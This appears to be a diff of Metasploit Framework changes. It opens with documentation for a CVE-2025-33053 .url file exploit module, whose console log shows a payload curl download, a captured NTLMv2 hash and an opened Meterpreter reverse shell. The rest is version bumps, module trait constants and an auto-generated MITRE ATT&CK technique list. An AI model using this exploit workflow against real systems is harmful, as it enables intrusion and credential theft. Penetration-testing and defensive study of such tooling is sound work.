+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > [*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] URL file: /home/ms/.msf4/local/YWSXVjpW.url, deliver to target's machine and wait for shell
+[*] Run following: curl http://192.168.3.7:8080/YWSXVjpW.url -o YWSXVjpW.url
+[*] Server is running. Listening on 192.168.3.7:4445
+[*] The SMB service has been started.
+[*] Received SMB connection from 10.5.132.137
+[SMB] NTLMv2-SSP Client     : 10.5.132.137
+[SMB] NTLMv2-SSP Username   : WIN10_22H2_7FD2\msfuser
+[SMB] NTLMv2-SSP Hash       : msfuser::WIN10_22H2_7FD2:[HASH]
+
+[*] Sending stage (203846 bytes) to 10.5.132.137
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.137:49740) at 2025-06-24 16:08:56 +0200
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN10_22H2_7FD2\msfuser @ WIN10_22H2_7FD2  192.168.3.7:4444 -> 10.5.132.137:49740 (10.5.132.137)
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10_22H2_7FD2
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
+
+
+## References
+
+- [GitHub PoC](https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept)
+- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
+- [LOLBAS Project](https://lolbas-project.github.io)
+- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053)
+
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.69"
+      VERSION = "6.4.72"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -55,6 +55,8 @@ RankingName         =
 # Stability traits
 #

+# Module stability is unknown - this is a sentinel value, and is not a valid stability enum value
+UNKNOWN_STABILITY      = ['unknown-stability']
 # Module should not crash the service.
 CRASH_SAFE             = 'crash-safe'
 # Module may crash the service, but the service restarts.
@@ -74,6 +76,8 @@ OS_RESOURCE_LOSS       = 'os-resource-loss'
 # Side-effect traits
 #

+# Module side effects is unknown - this is a sentinel value, and is not a valid side effect enum value
+UNKNOWN_SIDE_EFFECTS = ['unknown-side-effects']
 # Modules leaves a payload or a dropper on the target machine.
 ARTIFACTS_ON_DISK = 'artifacts-on-disk'
 # Module modifies some configuration setting on the target machine.
@@ -95,6 +99,8 @@ PHYSICAL_EFFECTS  = 'physical-effects'
 # Reliability
 #

+# Module reliability is unknown - this is a sentinel value, and is not a valid reliability enum value
+UNKNOWN_RELIABILITY = ['unknown-reliability']
 # The module tends to fail to get a session on the first attempt.
 FIRST_ATTEMPT_FAIL = 'first-attempt-fail'
 # The module is expected to get a shell every time it runs.
@@ -59,8 +59,8 @@ module Msf
        name: DEFER_MODULE_LOADS,
        description: 'When enabled will not eagerly load all modules',
        requires_restart: true,
-        default_value: false,
-        developer_notes: 'Needs a final round of testing. Can be enabled after 6.4.0 is released.'
+        default_value: true,
+        developer_notes: 'Enabled in Metasploit 6.4.x'
      }.freeze,
      {
        name: SMB_SESSION_TYPE,
@@ -0,0 +1,20 @@
+# frozen_string_literal: true
+
+module Msf
+  module Mitre
+    module Attack
+      module Categories
+        PATHS = {
+          'TA' => 'tactics',
+          'DS' => 'datasources',
+          'S' => 'software',
+          'M' => 'mitigations',
+          'A' => 'assets',
+          'G' => 'groups',
+          'C' => 'campaigns',
+          'T' => 'techniques'
+        }.freeze
+      end
+    end
+  end
+end
@@ -0,0 +1,1184 @@
+# frozen_string_literal: true
+
+module Msf
+  module Mitre
+    module Attack
+      # This file was auto-generated by tools/dev/generate_mitre_attack_technique_constants.rb please do not manually edit it
+      module Technique
+        T1001_DATA_OBFUSCATION = 'T1001'
+        T1001_001_JUNK_DATA = 'T1001.001'
+        T1001_002_STEGANOGRAPHY = 'T1001.002'
+        T1001_003_PROTOCOL_OR_SERVICE_IMPERSONATION = 'T1001.003'
+
+        T1002_DATA_COMPRESSED = 'T1002'
+
+        T1003_OS_CREDENTIAL_DUMPING = 'T1003'
+        T1003_001_LSASS_MEMORY = 'T1003.001'
+        T1003_002_SECURITY_ACCOUNT_MANAGER = 'T1003.002'
+        T1003_003_NTDS = 'T1003.003'
+        T1003_004_LSA_SECRETS = 'T1003.004'
+        T1003_005_CACHED_DOMAIN_CREDENTIALS = 'T1003.005'
+        T1003_006_DCSYNC = 'T1003.006'
+        T1003_007_PROC_FILESYSTEM = 'T1003.007'
+        T1003_008_ETC_PASSWD_AND_ETC_SHADOW = 'T1003.008'
+
+        T1004_WINLOGON_HELPER_DLL = 'T1004'
+
+        T1005_DATA_FROM_LOCAL_SYSTEM = 'T1005'
+
+        T1006_DIRECT_VOLUME_ACCESS = 'T1006'
+
+        T1007_SYSTEM_SERVICE_DISCOVERY = 'T1007'
+
+        T1008_FALLBACK_CHANNELS = 'T1008'
+
+        T1009_BINARY_PADDING = 'T1009'
+
+        T1010_APPLICATION_WINDOW_DISCOVERY = 'T1010'
+
+        T1011_EXFILTRATION_OVER_OTHER_NETWORK_MEDIUM = 'T1011'
+        T1011_001_EXFILTRATION_OVER_BLUETOOTH = 'T1011.001'
+
+        T1012_QUERY_REGISTRY = 'T1012'
+
+        T1013_PORT_MONITORS = 'T1013'
+
+        T1014_ROOTKIT = 'T1014'
+
+        T1015_ACCESSIBILITY_FEATURES = 'T1015'
+
+        T1016_SYSTEM_NETWORK_CONFIGURATION_DISCOVERY = 'T1016'
+        T1016_001_INTERNET_CONNECTION_DISCOVERY = 'T1016.001'
+        T1016_002_WI_FI_DISCOVERY = 'T1016.002'
+
+        T1017_APPLICATION_DEPLOYMENT_SOFTWARE = 'T1017'
+
+        T1018_REMOTE_SYSTEM_DISCOVERY = 'T1018'
+
+        T1019_SYSTEM_FIRMWARE = 'T1019'
+
+        T1020_AUTOMATED_EXFILTRATION = 'T1020'
+        T1020_001_TRAFFIC_DUPLICATION = 'T1020.001'
+
+        T1021_REMOTE_SERVICES = 'T1021'
+        T1021_001_REMOTE_DESKTOP_PROTOCOL = 'T1021.001'
+        T1021_002_SMB_WINDOWS_ADMIN_SHARES = 'T1021.002'
+        T1021_003_DISTRIBUTED_COMPONENT_OBJECT_MODEL = 'T1021.003'
+        T1021_004_SSH = 'T1021.004'
+        T1021_005_VNC = 'T1021.005'
+        T1021_006_WINDOWS_REMOTE_MANAGEMENT = 'T1021.006'
+        T1021_007_CLOUD_SERVICES = 'T1021.007'
+        T1021_008_DIRECT_CLOUD_VM_CONNECTIONS = 'T1021.008'
+
+        T1022_DATA_ENCRYPTED = 'T1022'
+
+        T1023_SHORTCUT_MODIFICATION = 'T1023'
+
+        T1024_CUSTOM_CRYPTOGRAPHIC_PROTOCOL = 'T1024'
+
+        T1025_DATA_FROM_REMOVABLE_MEDIA = 'T1025'
+
+        T1026_MULTIBAND_COMMUNICATION = 'T1026'
+
+        T1027_OBFUSCATED_FILES_OR_INFORMATION = 'T1027'
+        T1027_001_BINARY_PADDING = 'T1027.001'
+        T1027_002_SOFTWARE_PACKING = 'T1027.002'
+        T1027_003_STEGANOGRAPHY = 'T1027.003'
+        T1027_004_COMPILE_AFTER_DELIVERY = 'T1027.004'
+        T1027_005_INDICATOR_REMOVAL_FROM_TOOLS = 'T1027.005'
+        T1027_006_HTML_SMUGGLING = 'T1027.006'
+        T1027_007_DYNAMIC_API_RESOLUTION = 'T1027.007'
+        T1027_008_STRIPPED_PAYLOADS = 'T1027.008'
+        T1027_009_EMBEDDED_PAYLOADS = 'T1027.009'
+        T1027_010_COMMAND_OBFUSCATION = 'T1027.010'
+        T1027_011_FILELESS_STORAGE = 'T1027.011'
+        T1027_012_LNK_ICON_SMUGGLING = 'T1027.012'
+        T1027_013_ENCRYPTED_ENCODED_FILE = 'T1027.013'
+        T1027_014_POLYMORPHIC_CODE = 'T1027.014'
+        T1027_015_COMPRESSION = 'T1027.015'
+        T1027_016_JUNK_CODE_INSERTION = 'T1027.016'
+        T1027_017_SVG_SMUGGLING = 'T1027.017'
+
+        T1028_WINDOWS_REMOTE_MANAGEMENT = 'T1028'
+
+        T1029_SCHEDULED_TRANSFER = 'T1029'
+
+        T1030_DATA_TRANSFER_SIZE_LIMITS = 'T1030'
+
+        T1031_MODIFY_EXISTING_SERVICE = 'T1031'
+
+        T1032_STANDARD_CRYPTOGRAPHIC_PROTOCOL = 'T1032'
+
+        T1033_SYSTEM_OWNER_USER_DISCOVERY = 'T1033'
+
+        T1034_PATH_INTERCEPTION = 'T1034'
+
+        T1035_SERVICE_EXECUTION = 'T1035'
+
+        T1036_MASQUERADING = 'T1036'
+        T1036_001_INVALID_CODE_SIGNATURE = 'T1036.001'
+        T1036_002_RIGHT_TO_LEFT_OVERRIDE = 'T1036.002'
+        T1036_003_RENAME_LEGITIMATE_UTILITIES = 'T1036.003'
+        T1036_004_MASQUERADE_TASK_OR_SERVICE = 'T1036.004'
+        T1036_005_MATCH_LEGITIMATE_RESOURCE_NAME_OR_LOCATION = 'T1036.005'
+        T1036_006_SPACE_AFTER_FILENAME = 'T1036.006'
+        T1036_007_DOUBLE_FILE_EXTENSION = 'T1036.007'
+        T1036_008_MASQUERADE_FILE_TYPE = 'T1036.008'
+        T1036_009_BREAK_PROCESS_TREES = 'T1036.009'
+        T1036_010_MASQUERADE_ACCOUNT_NAME = 'T1036.010'
+        T1036_011_OVERWRITE_PROCESS_ARGUMENTS = 'T1036.011'
+
+        T1037_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS = 'T1037'
+        T1037_001_LOGON_SCRIPT_WINDOWS = 'T1037.001'
+        T1037_002_LOGIN_HOOK = 'T1037.002'
+        T1037_003_NETWORK_LOGON_SCRIPT = 'T1037.003'
+        T1037_004_RC_SCRIPTS = 'T1037.004'
+        T1037_005_STARTUP_ITEMS = 'T1037.005'
+
+        T1038_DLL_SEARCH_ORDER_HIJACKING = 'T1038'
+
+        T1039_DATA_FROM_NETWORK_SHARED_DRIVE = 'T1039'
+
+        T1040_NETWORK_SNIFFING = 'T1040'
+
+        T1041_EXFILTRATION_OVER_C2_CHANNEL = 'T1041'
+
+        T1042_CHANGE_DEFAULT_FILE_ASSOCIATION = 'T1042'
+
+        T1043_COMMONLY_USED_PORT = 'T1043'
+
+        T1044_FILE_SYSTEM_PERMISSIONS_WEAKNESS = 'T1044'
+
+        T1045_SOFTWARE_PACKING = 'T1045'
+
+        T1046_NETWORK_SERVICE_DISCOVERY = 'T1046'
+
+        T1047_WINDOWS_MANAGEMENT_INSTRUMENTATION = 'T1047'
+
+        T1048_EXFILTRATION_OVER_ALTERNATIVE_PROTOCOL = 'T1048'
+        T1048_001_EXFILTRATION_OVER_SYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL = 'T1048.001'
+        T1048_002_EXFILTRATION_OVER_ASYMMETRIC_ENCRYPTED_NON_C2_PROTOCOL = 'T1048.002'
+        T1048_003_EXFILTRATION_OVER_UNENCRYPTED_NON_C2_PROTOCOL = 'T1048.003'
+
+        T1049_SYSTEM_NETWORK_CONNECTIONS_DISCOVERY = 'T1049'
+
+        T1050_NEW_SERVICE = 'T1050'
+
+        T1051_SHARED_WEBROOT = 'T1051'
+
+        T1052_EXFILTRATION_OVER_PHYSICAL_MEDIUM = 'T1052'
+        T1052_001_EXFILTRATION_OVER_USB = 'T1052.001'
+
+        T1053_SCHEDULED_TASK_JOB = 'T1053'
+        T1053_001_AT_LINUX = 'T1053.001'
+        T1053_002_AT = 'T1053.002'
+        T1053_003_CRON = 'T1053.003'
+        T1053_004_LAUNCHD = 'T1053.004'
+        T1053_005_SCHEDULED_TASK = 'T1053.005'
+        T1053_006_SYSTEMD_TIMERS = 'T1053.006'
+        T1053_007_CONTAINER_ORCHESTRATION_JOB = 'T1053.007'
+
+        T1054_INDICATOR_BLOCKING = 'T1054'
+
+        T1055_PROCESS_INJECTION = 'T1055'
+        T1055_001_DYNAMIC_LINK_LIBRARY_INJECTION = 'T1055.001'
+        T1055_002_PORTABLE_EXECUTABLE_INJECTION = 'T1055.002'
+        T1055_003_THREAD_EXECUTION_HIJACKING = 'T1055.003'
+        T1055_004_ASYNCHRONOUS_PROCEDURE_CALL = 'T1055.004'
+        T1055_005_THREAD_LOCAL_STORAGE = 'T1055.005'
+        T1055_008_PTRACE_SYSTEM_CALLS = 'T1055.008'
+        T1055_009_PROC_MEMORY = 'T1055.009'
+        T1055_011_EXTRA_WINDOW_MEMORY_INJECTION = 'T1055.011'
+        T1055_012_PROCESS_HOLLOWING = 'T1055.012'
+        T1055_013_PROCESS_DOPPELGANGING = 'T1055.013'
+        T1055_014_VDSO_HIJACKING = 'T1055.014'
+        T1055_015_LISTPLANTING = 'T1055.015'
+
+        T1056_INPUT_CAPTURE = 'T1056'
+        T1056_001_KEYLOGGING = 'T1056.001'
+        T1056_002_GUI_INPUT_CAPTURE = 'T1056.002'
+        T1056_003_WEB_PORTAL_CAPTURE = 'T1056.003'
+        T1056_004_CREDENTIAL_API_HOOKING = 'T1056.004'
+
+        T1057_PROCESS_DISCOVERY = 'T1057'
+
+        T1058_SERVICE_REGISTRY_PERMISSIONS_WEAKNESS = 'T1058'
+
+        T1059_COMMAND_AND_SCRIPTING_INTERPRETER = 'T1059'
+        T1059_001_POWERSHELL = 'T1059.001'
+        T1059_002_APPLESCRIPT = 'T1059.002'
+        T1059_003_WINDOWS_COMMAND_SHELL = 'T1059.003'
+        T1059_004_UNIX_SHELL = 'T1059.004'
+        T1059_005_VISUAL_BASIC = 'T1059.005'
+        T1059_006_PYTHON = 'T1059.006'
+        T1059_007_JAVASCRIPT = 'T1059.007'
+        T1059_008_NETWORK_DEVICE_CLI = 'T1059.008'
+        T1059_009_CLOUD_API = 'T1059.009'
+        T1059_010_AUTOHOTKEY_AUTOIT = 'T1059.010'
+        T1059_011_LUA = 'T1059.011'
+        T1059_012_HYPERVISOR_CLI = 'T1059.012'
+
+        T1060_REGISTRY_RUN_KEYS_STARTUP_FOLDER = 'T1060'
+
+        T1061_GRAPHICAL_USER_INTERFACE = 'T1061'
+
+        T1062_HYPERVISOR = 'T1062'
+
+        T1063_SECURITY_SOFTWARE_DISCOVERY = 'T1063'
+
+        T1064_SCRIPTING = 'T1064'
+
+        T1065_UNCOMMONLY_USED_PORT = 'T1065'
+
+        T1066_INDICATOR_REMOVAL_FROM_TOOLS = 'T1066'
+
+        T1067_BOOTKIT = 'T1067'
+
+        T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION = 'T1068'
+
+        T1069_PERMISSION_GROUPS_DISCOVERY = 'T1069'
+        T1069_001_LOCAL_GROUPS = 'T1069.001'
+        T1069_002_DOMAIN_GROUPS = 'T1069.002'
+        T1069_003_CLOUD_GROUPS = 'T1069.003'
+
+        T1070_INDICATOR_REMOVAL = 'T1070'
+        T1070_001_CLEAR_WINDOWS_EVENT_LOGS = 'T1070.001'
+        T1070_002_CLEAR_LINUX_OR_MAC_SYSTEM_LOGS = 'T1070.002'
+        T1070_003_CLEAR_COMMAND_HISTORY = 'T1070.003'
+        T1070_004_FILE_DELETION = 'T1070.004'
+        T1070_005_NETWORK_SHARE_CONNECTION_REMOVAL = 'T1070.005'
+        T1070_006_TIMESTOMP = 'T1070.006'
+        T1070_007_CLEAR_NETWORK_CONNECTION_HISTORY_AND_CONFIGURATIONS = 'T1070.007'
+        T1070_008_CLEAR_MAILBOX_DATA = 'T1070.008'
+        T1070_009_CLEAR_PERSISTENCE = 'T1070.009'
+        T1070_010_RELOCATE_MALWARE = 'T1070.010'
+
+        T1071_APPLICATION_LAYER_PROTOCOL = 'T1071'
+        T1071_001_WEB_PROTOCOLS = 'T1071.001'
+        T1071_002_FILE_TRANSFER_PROTOCOLS = 'T1071.002'
+        T1071_003_MAIL_PROTOCOLS = 'T1071.003'
+        T1071_004_DNS = 'T1071.004'
+        T1071_005_PUBLISH_SUBSCRIBE_PROTOCOLS = 'T1071.005'
+
+        T1072_SOFTWARE_DEPLOYMENT_TOOLS = 'T1072'
+
+        T1073_DLL_SIDE_LOADING = 'T1073'
+
+        T1074_DATA_STAGED = 'T1074'
+        T1074_001_LOCAL_DATA_STAGING = 'T1074.001'
+        T1074_002_REMOTE_DATA_STAGING = 'T1074.002'
+
+        T1075_PASS_THE_HASH = 'T1075'
+
+        T1076_REMOTE_DESKTOP_PROTOCOL = 'T1076'
+
+        T1077_WINDOWS_ADMIN_SHARES = 'T1077'
+
+        T1078_VALID_ACCOUNTS = 'T1078'
+        T1078_001_DEFAULT_ACCOUNTS = 'T1078.001'
+        T1078_002_DOMAIN_ACCOUNTS = 'T1078.002'
+        T1078_003_LOCAL_ACCOUNTS = 'T1078.003'
+        T1078_004_CLOUD_ACCOUNTS = 'T1078.004'
+
+        T1079_MULTILAYER_ENCRYPTION = 'T1079'
+
+        T1080_TAINT_SHARED_CONTENT = 'T1080'
+
+        T1081_CREDENTIALS_IN_FILES = 'T1081'
+
+        T1082_SYSTEM_INFORMATION_DISCOVERY = 'T1082'
+
+        T1083_FILE_AND_DIRECTORY_DISCOVERY = 'T1083'
+
+        T1084_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION = 'T1084'
+
+        T1085_RUNDLL32 = 'T1085'
+
+        T1086_POWERSHELL = 'T1086'
+
+        T1087_ACCOUNT_DISCOVERY = 'T1087'
+        T1087_001_LOCAL_ACCOUNT = 'T1087.001'
+        T1087_002_DOMAIN_ACCOUNT = 'T1087.002'
+        T1087_003_EMAIL_ACCOUNT = 'T1087.003'
+        T1087_004_CLOUD_ACCOUNT = 'T1087.004'
+
+        T1088_BYPASS_USER_ACCOUNT_CONTROL = 'T1088'
+
+        T1089_DISABLING_SECURITY_TOOLS = 'T1089'
+
+        T1090_PROXY = 'T1090'
+        T1090_001_INTERNAL_PROXY = 'T1090.001'
+        T1090_002_EXTERNAL_PROXY = 'T1090.002'
+        T1090_003_MULTI_HOP_PROXY = 'T1090.003'
+        T1090_004_DOMAIN_FRONTING = 'T1090.004'
+
+        T1091_REPLICATION_THROUGH_REMOVABLE_MEDIA = 'T1091'
+
+        T1092_COMMUNICATION_THROUGH_REMOVABLE_MEDIA = 'T1092'
+
+        T1093_PROCESS_HOLLOWING = 'T1093'
+
+        T1094_CUSTOM_COMMAND_AND_CONTROL_PROTOCOL = 'T1094'
+
+        T1095_NON_APPLICATION_LAYER_PROTOCOL = 'T1095'
+
+        T1096_NTFS_FILE_ATTRIBUTES = 'T1096'
+
+        T1097_PASS_THE_TICKET = 'T1097'
+
+        T1098_ACCOUNT_MANIPULATION = 'T1098'
+        T1098_001_ADDITIONAL_CLOUD_CREDENTIALS = 'T1098.001'
+        T1098_002_ADDITIONAL_EMAIL_DELEGATE_PERMISSIONS = 'T1098.002'
+        T1098_003_ADDITIONAL_CLOUD_ROLES = 'T1098.003'
+        T1098_004_SSH_AUTHORIZED_KEYS = 'T1098.004'
+        T1098_005_DEVICE_REGISTRATION = 'T1098.005'
+        T1098_006_ADDITIONAL_CONTAINER_CLUSTER_ROLES = 'T1098.006'
+        T1098_007_ADDITIONAL_LOCAL_OR_DOMAIN_GROUPS = 'T1098.007'
+
+        T1099_TIMESTOMP = 'T1099'
+
+        T1100_WEB_SHELL = 'T1100'
+
+        T1101_SECURITY_SUPPORT_PROVIDER = 'T1101'
+
+        T1102_WEB_SERVICE = 'T1102'
+        T1102_001_DEAD_DROP_RESOLVER = 'T1102.001'
+        T1102_002_BIDIRECTIONAL_COMMUNICATION = 'T1102.002'
+        T1102_003_ONE_WAY_COMMUNICATION = 'T1102.003'
+
+        T1103_APPINIT_DLLS = 'T1103'
+
+        T1104_MULTI_STAGE_CHANNELS = 'T1104'
+
+        T1105_INGRESS_TOOL_TRANSFER = 'T1105'
+
+        T1106_NATIVE_API = 'T1106'
+
+        T1107_FILE_DELETION = 'T1107'
+
+        T1108_REDUNDANT_ACCESS = 'T1108'
+
+        T1109_COMPONENT_FIRMWARE = 'T1109'
+
+        T1110_BRUTE_FORCE = 'T1110'
+        T1110_001_PASSWORD_GUESSING = 'T1110.001'
+        T1110_002_PASSWORD_CRACKING = 'T1110.002'
+        T1110_003_PASSWORD_SPRAYING = 'T1110.003'
+        T1110_004_CREDENTIAL_STUFFING = 'T1110.004'
+
+        T1111_MULTI_FACTOR_AUTHENTICATION_INTERCEPTION = 'T1111'
+
+        T1112_MODIFY_REGISTRY = 'T1112'
+
+        T1113_SCREEN_CAPTURE = 'T1113'
+
+        T1114_EMAIL_COLLECTION = 'T1114'
+        T1114_001_LOCAL_EMAIL_COLLECTION = 'T1114.001'
+        T1114_002_REMOTE_EMAIL_COLLECTION = 'T1114.002'
+        T1114_003_EMAIL_FORWARDING_RULE = 'T1114.003'
+
+        T1115_CLIPBOARD_DATA = 'T1115'
+
+        T1116_CODE_SIGNING = 'T1116'
+
+        T1117_REGSVR32 = 'T1117'
+
+        T1118_INSTALLUTIL = 'T1118'
+
+        T1119_AUTOMATED_COLLECTION = 'T1119'
+
+        T1120_PERIPHERAL_DEVICE_DISCOVERY = 'T1120'
+
+        T1121_REGSVCS_REGASM = 'T1121'
+
+        T1122_COMPONENT_OBJECT_MODEL_HIJACKING = 'T1122'
+
+        T1123_AUDIO_CAPTURE = 'T1123'
+
+        T1124_SYSTEM_TIME_DISCOVERY = 'T1124'
+
+        T1125_VIDEO_CAPTURE = 'T1125'
+
+        T1126_NETWORK_SHARE_CONNECTION_REMOVAL = 'T1126'
+
+        T1127_TRUSTED_DEVELOPER_UTILITIES_PROXY_EXECUTION = 'T1127'
+        T1127_001_MSBUILD = 'T1127.001'
+        T1127_002_CLICKONCE = 'T1127.002'
+        T1127_003_JAMPLUS = 'T1127.003'
+
+        T1128_NETSH_HELPER_DLL = 'T1128'
+
+        T1129_SHARED_MODULES = 'T1129'
+
+        T1130_INSTALL_ROOT_CERTIFICATE = 'T1130'
+
+        T1131_AUTHENTICATION_PACKAGE = 'T1131'
+
+        T1132_DATA_ENCODING = 'T1132'
+        T1132_001_STANDARD_ENCODING = 'T1132.001'
+        T1132_002_NON_STANDARD_ENCODING = 'T1132.002'
+
+        T1133_EXTERNAL_REMOTE_SERVICES = 'T1133'
+
+        T1134_ACCESS_TOKEN_MANIPULATION = 'T1134'
+        T1134_001_TOKEN_IMPERSONATION_THEFT = 'T1134.001'
+        T1134_002_CREATE_PROCESS_WITH_TOKEN = 'T1134.002'
+        T1134_003_MAKE_AND_IMPERSONATE_TOKEN = 'T1134.003'
+        T1134_004_PARENT_PID_SPOOFING = 'T1134.004'
+        T1134_005_SID_HISTORY_INJECTION = 'T1134.005'
+
+        T1135_NETWORK_SHARE_DISCOVERY = 'T1135'
+
+        T1136_CREATE_ACCOUNT = 'T1136'
+        T1136_001_LOCAL_ACCOUNT = 'T1136.001'
+        T1136_002_DOMAIN_ACCOUNT = 'T1136.002'
+        T1136_003_CLOUD_ACCOUNT = 'T1136.003'
+
+        T1137_OFFICE_APPLICATION_STARTUP = 'T1137'
+        T1137_001_OFFICE_TEMPLATE_MACROS = 'T1137.001'
+        T1137_002_OFFICE_TEST = 'T1137.002'
+        T1137_003_OUTLOOK_FORMS = 'T1137.003'
+        T1137_004_OUTLOOK_HOME_PAGE = 'T1137.004'
+        T1137_005_OUTLOOK_RULES = 'T1137.005'
+        T1137_006_ADD_INS = 'T1137.006'
+
+        T1138_APPLICATION_SHIMMING = 'T1138'
+
+        T1139_BASH_HISTORY = 'T1139'
+
+        T1140_DEOBFUSCATE_DECODE_FILES_OR_INFORMATION = 'T1140'
+
+        T1141_INPUT_PROMPT = 'T1141'
+
+        T1142_KEYCHAIN = 'T1142'
+
+        T1143_HIDDEN_WINDOW = 'T1143'
+
+        T1144_GATEKEEPER_BYPASS = 'T1144'
+
+        T1145_PRIVATE_KEYS = 'T1145'
+
+        T1146_CLEAR_COMMAND_HISTORY = 'T1146'
+
+        T1147_HIDDEN_USERS = 'T1147'
+
+        T1148_HISTCONTROL = 'T1148'
+
+        T1149_LC_MAIN_HIJACKING = 'T1149'
+
+        T1150_PLIST_MODIFICATION = 'T1150'
+
+        T1151_SPACE_AFTER_FILENAME = 'T1151'
+
+        T1152_LAUNCHCTL = 'T1152'
+
+        T1153_SOURCE = 'T1153'
+
+        T1154_TRAP = 'T1154'
+
+        T1155_APPLESCRIPT = 'T1155'
+
+        T1156_MALICIOUS_SHELL_MODIFICATION = 'T1156'
+
+        T1157_DYLIB_HIJACKING = 'T1157'
+
+        T1158_HIDDEN_FILES_AND_DIRECTORIES = 'T1158'
+
+        T1159_LAUNCH_AGENT = 'T1159'
+
+        T1160_LAUNCH_DAEMON = 'T1160'
+
+        T1161_LC_LOAD_DYLIB_ADDITION = 'T1161'
+
+        T1162_LOGIN_ITEM = 'T1162'
+
+        T1163_RC_COMMON = 'T1163'
+
+        T1164_RE_OPENED_APPLICATIONS = 'T1164'
+
+        T1165_STARTUP_ITEMS = 'T1165'
+
+        T1166_SETUID_AND_SETGID = 'T1166'
+
+        T1167_SECURITYD_MEMORY = 'T1167'
+
+        T1168_LOCAL_JOB_SCHEDULING = 'T1168'
+
+        T1169_SUDO = 'T1169'
+
+        T1170_MSHTA = 'T1170'
+
+        T1171_LLMNR_NBT_NS_POISONING_AND_RELAY = 'T1171'
+
+        T1172_DOMAIN_FRONTING = 'T1172'
+
+        T1173_DYNAMIC_DATA_EXCHANGE = 'T1173'
+
+        T1174_PASSWORD_FILTER_DLL = 'T1174'
+
+        T1175_COMPONENT_OBJECT_MODEL_AND_DISTRIBUTED_COM = 'T1175'
+
+        T1176_SOFTWARE_EXTENSIONS = 'T1176'
+        T1176_001_BROWSER_EXTENSIONS = 'T1176.001'
+        T1176_002_IDE_EXTENSIONS = 'T1176.002'
+
+        T1177_LSASS_DRIVER = 'T1177'
+
+        T1178_SID_HISTORY_INJECTION = 'T1178'
+
+        T1179_HOOKING = 'T1179'
+
+        T1180_SCREENSAVER = 'T1180'
+
+        T1181_EXTRA_WINDOW_MEMORY_INJECTION = 'T1181'
+
+        T1182_APPCERT_DLLS = 'T1182'
+
+        T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION = 'T1183'
+
+        T1184_SSH_HIJACKING = 'T1184'
+
+        T1185_BROWSER_SESSION_HIJACKING = 'T1185'
+
+        T1186_PROCESS_DOPPELGANGING = 'T1186'
+
+        T1187_FORCED_AUTHENTICATION = 'T1187'
+
+        T1188_MULTI_HOP_PROXY = 'T1188'
+
+        T1189_DRIVE_BY_COMPROMISE = 'T1189'
+
+        T1190_EXPLOIT_PUBLIC_FACING_APPLICATION = 'T1190'
+
+        T1191_CMSTP = 'T1191'
+
+        T1192_SPEARPHISHING_LINK = 'T1192'
+
+        T1193_SPEARPHISHING_ATTACHMENT = 'T1193'
+
+        T1194_SPEARPHISHING_VIA_SERVICE = 'T1194'
+
+        T1195_SUPPLY_CHAIN_COMPROMISE = 'T1195'
+        T1195_001_COMPROMISE_SOFTWARE_DEPENDENCIES_AND_DEVELOPMENT_TOOLS = 'T1195.001'
+        T1195_002_COMPROMISE_SOFTWARE_SUPPLY_CHAIN = 'T1195.002'
+        T1195_003_COMPROMISE_HARDWARE_SUPPLY_CHAIN = 'T1195.003'
+
+        T1196_CONTROL_PANEL_ITEMS = 'T1196'
+
+        T1197_BITS_JOBS = 'T1197'
+
+        T1198_SIP_AND_TRUST_PROVIDER_HIJACKING = 'T1198'
+
+        T1199_TRUSTED_RELATIONSHIP = 'T1199'
+
+        T1200_HARDWARE_ADDITIONS = 'T1200'
+
+        T1201_PASSWORD_POLICY_DISCOVERY = 'T1201'
+
+        T1202_INDIRECT_COMMAND_EXECUTION = 'T1202'
+
+        T1203_EXPLOITATION_FOR_CLIENT_EXECUTION = 'T1203'
+
+        T1204_USER_EXECUTION = 'T1204'
+        T1204_001_MALICIOUS_LINK = 'T1204.001'
+        T1204_002_MALICIOUS_FILE = 'T1204.002'
+        T1204_003_MALICIOUS_IMAGE = 'T1204.003'
+        T1204_004_MALICIOUS_COPY_AND_PASTE = 'T1204.004'
+
+        T1205_TRAFFIC_SIGNALING = 'T1205'
+        T1205_001_PORT_KNOCKING = 'T1205.001'
+        T1205_002_SOCKET_FILTERS = 'T1205.002'
+
+        T1206_SUDO_CACHING = 'T1206'
+
+        T1207_ROGUE_DOMAIN_CONTROLLER = 'T1207'
+
+        T1208_KERBEROASTING = 'T1208'
+
+        T1209_TIME_PROVIDERS = 'T1209'
+
+        T1210_EXPLOITATION_OF_REMOTE_SERVICES = 'T1210'
+
+        T1211_EXPLOITATION_FOR_DEFENSE_EVASION = 'T1211'
+
+        T1212_EXPLOITATION_FOR_CREDENTIAL_ACCESS = 'T1212'
+
+        T1213_DATA_FROM_INFORMATION_REPOSITORIES = 'T1213'
+        T1213_001_CONFLUENCE = 'T1213.001'
+        T1213_002_SHAREPOINT = 'T1213.002'
+        T1213_003_CODE_REPOSITORIES = 'T1213.003'
+        T1213_004_CUSTOMER_RELATIONSHIP_MANAGEMENT_SOFTWARE = 'T1213.004'
+        T1213_005_MESSAGING_APPLICATIONS = 'T1213.005'
+
+        T1214_CREDENTIALS_IN_REGISTRY = 'T1214'
+
+        T1215_KERNEL_MODULES_AND_EXTENSIONS = 'T1215'
+
+        T1216_SYSTEM_SCRIPT_PROXY_EXECUTION = 'T1216'
